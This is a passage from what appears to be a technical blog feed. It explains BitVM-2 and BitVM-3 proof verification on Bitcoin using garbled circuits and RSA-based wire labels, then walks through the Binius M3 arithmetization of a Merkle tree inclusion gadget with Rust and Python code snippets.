&lt;p&gt;To prevent malicious verifiers from challenging correct executions just to increase the cost for the prover, verifiers have to pay a fee, which should be at least equal to the cost of posting an intermediate step.&lt;&#x2F;p&gt;
&lt;p&gt;BitVM-2 could be implemented in a simpler fashion if covenants were available in Bitcoin. These are a proposed class of spending constraints allowing a locking script to restrict how the coins in UTXOs can be spent in the future. To circumvent this, during the setup phase of every instance of the BitVM, a committee of $n$ signers creates a new key pair, presigns messages with the key that should be used to spend the UTXO, establishing that an $n$-of-$n$ quorum must be reached. The members then delete their keys, ensuring that funds can only be spent in the intended way. As long as a single one of them complies with this, we ensure that the constraints are enforced.&lt;&#x2F;p&gt;
&lt;p&gt;There are a couple of objections to this design, particularly regarding the bridge. For example, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;@twhittle&#x2F;bitvm-bridges-considered-unsafe-9e1ce75c8176&quot;&gt;here&lt;&#x2F;a&gt; it is shown that the bridge is secure only so long as the operator is collateralized at least 1:1. Different options are considered in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stacker.news&#x2F;items&#x2F;495391&quot;&gt;following discussion&lt;&#x2F;a&gt;. The fact that security requires very large liquidity poses a great threat and has practical implications. Another drawback of this design is the still-high cost of asserting and disproving a transaction, with a large on-chain footprint.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;bitvm-3&quot;&gt;BitVM-3&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;bitvm.org&#x2F;bitvm3.pdf&quot;&gt;BitVM-3&lt;&#x2F;a&gt; uses garbled circuits to reduce the on-chain footprint of its predecessor. The circuit is designed to conditionally reveal a secret only if the garbler provides an invalid SNARK proof, acting as a fraud proof. Garbled circuits are a technique from secure two-party computation (Yao’s protocol) where one party (garbler) creates an encrypted version of a boolean circuit and provides “keys” for the input values such that the other party (evaluator) can evaluate the circuit without learning intermediate values – except for the final output, which in certain cases can be a secret reveal. In the context of BitVM3, the idea is that the Prover garbles the SNARK verifier circuit in such a way that if the SNARK proof provided is invalid, the garbled circuit’s output reveals a secret (which serves as a fraud proof).&lt;&#x2F;p&gt;
&lt;p&gt;The largest cost involves sharing the circuit, which takes 5 TB of data. While this can take several days, it is a one-time setup cost. Asserting a transaction takes around 56 kB, while disproving a transaction involves roughly 200 bytes (compared to between 2 and 4 MB in BitVM-2). This cost reduction puts proof verification in Bitcoin in the realm of feasibility, though we still need to overcome the large communication costs of the circuit, which should go down with further optimizations.&lt;&#x2F;p&gt;
&lt;p&gt;The garbling of the circuit relies on RSA. Each wire in the circuit has two possible keys corresponding to 0 or 1. The garbler (Prover) generates these such that only the correct combination yields a meaningful output key. According to the BitVM3 text, the garbler selects an RSA modulus $N = (2p + 1)(2q + 1)$ (product of two safe primes) and some public exponents $e, e_1 , e_2 , e_3 , e_4$. There are also secret exponents, $d, d_1 , d_2 , d_3 , d_4$ and $h = e_1 e_4 d_2 - e_3$. The $e_i$ and $d_i$ are inverses modulo $\phi (N)&#x2F;4 = pq$, that is $e_i d_i \equiv 1 \pmod{pq}$. Using the secret factors of $N$ (the trapdoor), the garbler computes wire label values such that the relationships between them hold if and only if the gate’s logical truth table is satisfied. For the output labels $c_0, c_1$ from the circuit, he computes the secret input wire labels $a_0, a_1, b_0, b_1$ from the following equations:&lt;br &#x2F;&gt;
$$
\begin{align*}
b_0 &amp;amp;= (c_1 c_0^{-1} )^{ h^{-1} } \pmod{N} \\
b_1 &amp;amp;= b_0^{ e_1 d_2} \pmod{N} \\
a_0 &amp;amp;= c_0^d b_0^{ - e_1 d} \pmod{N} \\
a_1 &amp;amp;= c_0^d b_0^{ - e_3 d} \pmod{N}
\end{align*}
$$&lt;&#x2F;p&gt;
&lt;p&gt;These exponentiations can be computed efficiently, since the exponents $e_i$ are chosen as small numbers. Besides, $b_0^d$ and $c_0^d$ can be computed just once and reused in the calculations.&lt;&#x2F;p&gt;
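&lt;p&gt;To make the exponent arithmetic concrete, here is a toy example with tiny, purely illustrative parameters (not from the BitVM3 paper): $p = 5$, $q = 11$, so $N = 11 \cdot 23 = 253$ and $\phi(N)&#x2F;4 = pq = 55$. Choosing $e = 3$ and $d = 37$ gives $ed \equiv 1 \pmod{55}$, and for a label chosen as a fourth power (so that its multiplicative order divides $pq$), raising to $e$ and then to $d$ recovers the label.&lt;&#x2F;p&gt;

```rust
/// Square-and-multiply modular exponentiation.
fn modpow(mut base: u128, mut exp: u128, n: u128) -> u128 {
    let mut acc = 1;
    base %= n;
    while exp > 0 {
        if exp & 1 == 1 {
            acc = acc * base % n;
        }
        base = base * base % n;
        exp >>= 1;
    }
    acc
}
```

&lt;p&gt;With $N = 253$ and the label $16 = 2^4$, we have $16^{ed} = 16^{111} \equiv 16 \pmod{253}$, since $16$ lies in the subgroup whose order divides $55$. This inverse relation between public and secret exponents is what the garbler exploits when deriving the wire labels.&lt;&#x2F;p&gt;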
&lt;p&gt;The garbler starts from the output of the circuit and works backwards, producing the labels $a_0 , a_1 , b_0 , b_1$ for each gate. For a preceding gate with output feeding into the first input of the next gate, use $c_0 = a_0$ and $c_1 = a_1$ and if it is for the other input, use $b_0$ and $b_1$.&lt;&#x2F;p&gt;
&lt;p&gt;To handle more general gates (with fan-out &amp;gt; 1, that is, an output wire feeding more than one gate), the garbler precomputes and publishes a static factor $T_{ik}$. For an output wire $W_{y}$ with labels $l_{y0} , l_{y1}$ that feeds an input wire $W_x$, the labels are related by&lt;br &#x2F;&gt;
$$l_{xi,k} = l_{yi,k} T_{ik}$$&lt;br &#x2F;&gt;
so that $T_{ik} = l_{xi,k} l_{yi,k}^{ - 1 }$. The adaptors become part of the public parameters of the circuit.&lt;&#x2F;p&gt;
&lt;p&gt;We can also reblind the labels several times (which amounts to reusing the circuit several times). This is useful to define smaller subcircuits which are used several times, such as field arithmetic or elliptic curve operations. For each round of reblinding, the garbler needs to publish a new $u_k$ which is pairwise coprime with the exponents of previous rounds (that is, $\gcd(u_k, u_i) = 1$).&lt;&#x2F;p&gt;
&lt;p&gt;In case we are using different subcircuits for field operations, we need to add connectors linking the output of one subcircuit to the input of another one. To avoid telescoping attacks, the design keeps two copies of every subcircuit (for example, MulA and MulB) and forbids using the same copy twice in a row.&lt;&#x2F;p&gt;
&lt;p&gt;The verifier can check the correctness of the garbled circuit’s structure by checking each gate in plaintext. Thus, the garbler only needs to prove in zero-knowledge that the circuit’s inputs were correctly reblinded, and this involves only a few exponentiations. If the prover misbehaves by providing a wrong calculation, the circuit reveals the hash of the output label for 0 (a short string), which is used as a fraud proof.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;BitVM and its variants are a significant milestone in Bitcoin’s evolution, showing that it is possible to have general computation on top of Bitcoin (like Ethereum), without changes to how Bitcoin’s consensus works. The core idea is based on naysayer proofs, which reduce the on-chain footprint, the highest cost in the protocol. Since verifying the proof on-chain is expensive, we can have the prover post a claim on-chain, and watchers&#x2F;verifiers can do the check off-chain and dispute the prover’s claim using a short proof on-chain. BitVM-1 had a long challenge-response game, involving several transactions and long finality. BitVM-2 reduced the challenge-response game to only 3 transactions, but the costs remained high. BitVM-3 uses garbled circuits to further reduce the costs of proving and challenging to 56 kB and 200 bytes, respectively, at the expense of a very large setup. It is clear that research and engineering have been improving over the last year and that it won’t be long before we have trust-minimized bridges, L2s, and general smart contracts on Bitcoin. In upcoming posts, we will cover in more depth different aspects of Bitcoin, its L2 solutions, and other virtual machines.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Diving deep into Binius M3 arithmetization using Merkle tree inclusion as an example</title>
          <pubDate>Mon, 23 Jun 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/diving-deep-into-binius-m3-arithmetization-using-merkle-tree/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/diving-deep-into-binius-m3-arithmetization-using-merkle-tree/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/diving-deep-into-binius-m3-arithmetization-using-merkle-tree/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;At the heart of any Zero-Knowledge Proof (ZKP) system lies the concept of arithmetization, the process of transforming a computational problem into a mathematical problem that can be expressed and verified within a specific algebraic structure, such as polynomials or arithmetic circuits. Within the Binius framework, this arithmetization is managed through the &lt;strong&gt;Multi-Multiset Matching (M3)&lt;&#x2F;strong&gt; system, which introduces significant changes and improvements compared to more commonly used arithmetizations.&lt;&#x2F;p&gt;
&lt;p&gt;While previous posts focused on the mathematical foundations used by Binius—such as &lt;a href=&quot;&#x2F;the-fields-powering-binius&#x2F;&quot;&gt;binary fields&lt;&#x2F;a&gt; and &lt;a href=&quot;&#x2F;additive-fft-background&#x2F;&quot;&gt;additive FFT&lt;&#x2F;a&gt;—this post aims to explore how the Binius M3 system is implemented. To do so, we take a deep dive into a specific gadget: the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;tree&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;merkle_tree&quot;&gt;Merkle tree&lt;&#x2F;a&gt;. By walking through this example in detail, we aim to understand how constraint systems, tables, and channels are represented and handled in code.&lt;&#x2F;p&gt;
&lt;p&gt;To gain a more general intuition about why the tables and arithmetization techniques we explain in detail here actually work, we strongly recommend reading &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.binius.xyz&#x2F;basics&#x2F;arithmetization&#x2F;m3&quot;&gt;Binius M3 documentation&lt;&#x2F;a&gt;. It’s very clear and presents toy examples that help illustrate the core ideas.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;m3-general-idea&quot;&gt;M3 General Idea&lt;&#x2F;h2&gt;
&lt;p&gt;Unlike traditional arithmetizations, which often rely on a sequential main execution trace, M3 requires neither a main trace nor sequential tables. In M3, tables are merely declarative instances, designed specifically for the purpose of the proof. The prover fills these tables with data relevant to the computation, and the tables serve as a source for interacting with a key component: channels.&lt;&#x2F;p&gt;
&lt;p&gt;Within M3, tables and channels are the fundamental pillars for building and verifying complex computations. &lt;strong&gt;Tables&lt;&#x2F;strong&gt; are the primary means of representing and structuring computation data, functioning as collections of columns where each row represents a step or an instance of an operation. For example, in the context of a Merkle tree, some tables hold data for parent and child nodes.&lt;&#x2F;p&gt;
&lt;p&gt;Complementing tables, &lt;strong&gt;channels&lt;&#x2F;strong&gt; act as communication conduits within the M3 constraint system. They facilitate the flow of data between different tables, or between tables and the external world (such as public inputs and outputs). Tables &lt;strong&gt;push&lt;&#x2F;strong&gt; data into channels or &lt;strong&gt;pull&lt;&#x2F;strong&gt; data from them. This mechanism is crucial for connecting various parts of a complex computation, ensuring that data dependencies are correctly maintained and verifiable. To verify the validity of a proof, the verifier simply needs to check that all channels are &lt;strong&gt;balanced&lt;&#x2F;strong&gt;, meaning that the data pushed into a channel matches the data pulled from it.&lt;&#x2F;p&gt;
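&lt;p&gt;To make the balancing idea concrete, here is a minimal Python sketch (purely illustrative, with hypothetical names, not the Binius API) that models a channel as a pair of multisets and checks that pushes equal pulls:&lt;&#x2F;p&gt;

```python
# Sketch of M3 channel balancing as multiset matching (illustrative only,
# not the Binius API): a proof is valid iff every channel's pushes equal
# its pulls as multisets.
from collections import Counter

class Channel:
    def __init__(self, name):
        self.name = name
        self.pushes = Counter()
        self.pulls = Counter()

    def push(self, item):
        self.pushes[item] += 1

    def pull(self, item):
        self.pulls[item] += 1

    def is_balanced(self):
        # Balanced means the push multiset equals the pull multiset.
        return self.pushes == self.pulls

nodes = Channel("merkle_tree_nodes")
nodes.push(("root0", "digest_parent", 0, 0))  # a table row pushes the parent
nodes.pull(("root0", "digest_parent", 0, 0))  # another table pulls the same tuple
print(nodes.is_balanced())
```

&lt;p&gt;In Binius the check is enforced inside the proof system rather than by comparing multisets directly, but the validity condition is the same: every channel must end up balanced.&lt;&#x2F;p&gt;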
&lt;p&gt;While M3 also relies on polynomially-constrained tables, as previous schemes do, it departs from traditional approaches by using these tables solely to support channel balancing, rather than as a vehicle for constructing a global execution trace.&lt;&#x2F;p&gt;
&lt;p&gt;In this post, we’ll explore specific examples of tables and channels within the Binius Merkle Tree constraint system, illustrating how they are used to build a verifiable proof of Merkle Tree inclusion. To see all of that theory in action, the Merkle Tree example wraps the setup in a single helper: &lt;code&gt;MerkleTreeCS&lt;&#x2F;code&gt;. A call to &lt;code&gt;MerkleTreeCS::new&lt;&#x2F;code&gt; sets up five tables, opens three channels, and returns a constraint system that’s ready to be filled with path data. With the plumbing taken care of, we can now look at what each table and channel does.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;merkletreecs&quot;&gt;MerkleTreeCS&lt;&#x2F;h2&gt;
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;merkle_tree&#x2F;mod.rs#L45&quot;&gt;MerkleTreeCS&lt;&#x2F;a&gt; (Merkle Tree Constraint System) consists of 5 tables and 3 channels that work together to ensure the correctness of Merkle path verification.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;tables&quot;&gt;Tables&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;merkle_path_table_left&lt;&#x2F;code&gt;: A table of type &lt;code&gt;NodesTable&lt;&#x2F;code&gt; that handles Merkle paths where only the left child must be pulled from a channel. We’ll see in detail what this means later on.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;merkle_path_table_right&lt;&#x2F;code&gt;: A table of type &lt;code&gt;NodesTable&lt;&#x2F;code&gt; that handles cases where only the right child is pulled.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;merkle_path_table_both&lt;&#x2F;code&gt;: A table of type &lt;code&gt;NodesTable&lt;&#x2F;code&gt; that handles cases where both left and right children are pulled.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;root_table&lt;&#x2F;code&gt;: A table of type &lt;code&gt;RootTable&lt;&#x2F;code&gt; that reconciles the final values of Merkle paths with the expected roots.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;incr_table&lt;&#x2F;code&gt;: A table of type &lt;code&gt;IncrLookup&lt;&#x2F;code&gt;: a lookup table for increment operations used to verify the depth relationships between parent and child nodes.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;h3 id=&quot;channels&quot;&gt;Channels&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;nodes_channel&lt;&#x2F;code&gt;: Manages intermediate nodes in Merkle paths (format: &lt;code&gt;[Root ID, Digest, Depth, Index]&lt;&#x2F;code&gt;).&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;roots_channel&lt;&#x2F;code&gt;: Handles root verification (format: &lt;code&gt;[Root ID, Digest]&lt;&#x2F;code&gt;).&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;lookup_channel&lt;&#x2F;code&gt;: Coordinates increment operations to verify that each child’s depth is the parent’s depth plus one.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;h3 id=&quot;initialization&quot;&gt;Initialization&lt;&#x2F;h3&gt;
&lt;p&gt;The &lt;code&gt;MerkleTreeCS::new()&lt;&#x2F;code&gt; method constructs the entire constraint system. The main goal of this method is to add the tables and channels to &lt;code&gt;cs&lt;&#x2F;code&gt; (the constraint system) and create the &lt;code&gt;MerkleTreeCS&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn new(cs: &amp;amp;mut ConstraintSystem) -&amp;gt; Self {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let nodes_channel = cs.add_channel(&amp;quot;merkle_tree_nodes&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let roots_channel = cs.add_channel(&amp;quot;merkle_tree_roots&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let lookup_channel = cs.add_channel(&amp;quot;incr_lookup&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let permutation_channel = cs.add_channel(&amp;quot;permutation&amp;quot;);  &#x2F;&#x2F; ← NEW CHANNEL!&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Create the three Merkle path tables&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let merkle_path_table_left =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        NodesTable::new(cs, MerklePathPullChild::Left, nodes_channel, lookup_channel);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let merkle_path_table_right =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        NodesTable::new(cs, MerklePathPullChild::Right, nodes_channel, lookup_channel);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let merkle_path_table_both =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        NodesTable::new(cs, MerklePathPullChild::Both, nodes_channel, lookup_channel);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let root_table = RootTable::new(cs, nodes_channel, roots_channel);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Create the increment lookup table with the new permutation channel&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut table = cs.add_table(&amp;quot;incr_lookup_table&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let incr_table = IncrLookup::new(&amp;amp;mut table, lookup_channel, permutation_channel, 20);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Self { &#x2F;* ... *&#x2F; }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;As can be seen, there is an extra channel not mentioned before:&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;code&gt;permutation_channel&lt;&#x2F;code&gt; is a new channel introduced specifically for the &lt;code&gt;IncrLookup&lt;&#x2F;code&gt; table. It serves a crucial purpose in the lookup table verification process: it ensures that the two columns in &lt;code&gt;IncrLookup&lt;&#x2F;code&gt;, called &lt;code&gt;entries_ordered&lt;&#x2F;code&gt; and &lt;code&gt;entries_sorted&lt;&#x2F;code&gt;, are permutations of each other. We will examine them in detail later.&lt;&#x2F;p&gt;
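&lt;p&gt;Conceptually, the property the permutation channel enforces boils down to a multiset-equality check between the two columns. A minimal Python sketch (illustrative only, not how Binius implements it):&lt;&#x2F;p&gt;

```python
# Illustrative sketch (not the Binius API): the permutation channel's job is
# to enforce that entries_ordered and entries_sorted hold the same multiset
# of values, i.e. that one column is a permutation of the other.
def is_permutation(entries_ordered, entries_sorted):
    return sorted(entries_ordered) == sorted(entries_sorted)

print(is_permutation([3, 1, 2], [1, 2, 3]))  # True
print(is_permutation([3, 1, 2], [1, 2, 4]))  # False
```

&lt;p&gt;In the actual constraint system this equality is established through channel balancing rather than by sorting, but the invariant being proven is the same.&lt;&#x2F;p&gt;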
&lt;h2 id=&quot;an-example-step-by-step&quot;&gt;An Example Step by Step&lt;&#x2F;h2&gt;
&lt;p&gt;We believe that the best way to understand how the constraint system is built and how the tables are created is by looking at an example. For this, we’ll use the example provided by Binius in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;examples&#x2F;merkle_tree.rs&quot;&gt;merkle_tree.rs&lt;&#x2F;a&gt;, where we’ll be able to construct a tree, some paths, the constraint system, and the proof that validates those paths.&lt;&#x2F;p&gt;
&lt;p&gt;The file begins with some arguments that we’re going to adjust. For simplicity, we want to create a tree with 8 leaves and prove that two of them are part of the tree. In other words, we’ll take &lt;code&gt;default_value_t = 3&lt;&#x2F;code&gt; for &lt;code&gt;log_leaves&lt;&#x2F;code&gt; (since we want an 8-leaf tree), &lt;code&gt;default_value_t = 1&lt;&#x2F;code&gt; for &lt;code&gt;log_paths&lt;&#x2F;code&gt; (since we want to prove two paths), and &lt;code&gt;default_value_t = 1&lt;&#x2F;code&gt; for &lt;code&gt;log_inv_rate&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;struct Args {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; The number of leaves in the merkle tree.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; By default 8 leaves.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    #[arg(long, default_value_t = 3, value_parser = value_parser!(u32).range(1..))]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    log_leaves: u32,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; The number of Merkle paths to verify.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; By default 2 paths.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    #[arg(short,long, default_value_t = 1, value_parser = value_parser!(u32).range(1..))]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    log_paths: u32,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; The negative binary logarithm of the Reed–Solomon code rate.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    #[arg(long, default_value_t = 1, value_parser = value_parser!(u32).range(1..))]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    log_inv_rate: u32,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;building-the-tree-and-paths&quot;&gt;Building the Tree and Paths&lt;&#x2F;h3&gt;
&lt;p&gt;Now that we have the arguments, if you follow the function &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;examples&#x2F;merkle_tree.rs#L39&quot;&gt;main()&lt;&#x2F;a&gt; you’ll see that the tree and the Merkle paths are built there. Let’s add some prints in this part of the code to see their values.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;* ... *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let mut rng = StdRng::seed_from_u64(0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Create a Merkle Tree with 8 leaves&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let leaves = (0..1 &amp;lt;&amp;lt; args.log_leaves)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .map(|_| rng.r#gen::&amp;lt;[u8; 32]&amp;gt;())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .collect::&amp;lt;Vec&amp;lt;_&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let tree = MerkleTree::new(&amp;amp;leaves);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let roots: [u8; 32] = tree.root();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;println!(&amp;quot;--------- Merkle tree data -------&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;println!(&amp;quot;Leaves: {:?}&amp;quot;, leaves);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;println!(&amp;quot;Root: {:?}&amp;quot;, roots);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let paths = (0..1 &amp;lt;&amp;lt; args.log_paths)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .map(|_| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let index = rng.gen_range(0..1 &amp;lt;&amp;lt; args.log_leaves);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        println!(&amp;quot;------- Path data -------&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        println!(&amp;quot;Proving leaf index: {:?}&amp;quot;, index);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        println!(&amp;quot;Proving leaf: {:?}&amp;quot;, leaves[index]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        println!(&amp;quot;Merkle tree path: {:?}&amp;quot;, tree.merkle_path(index));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
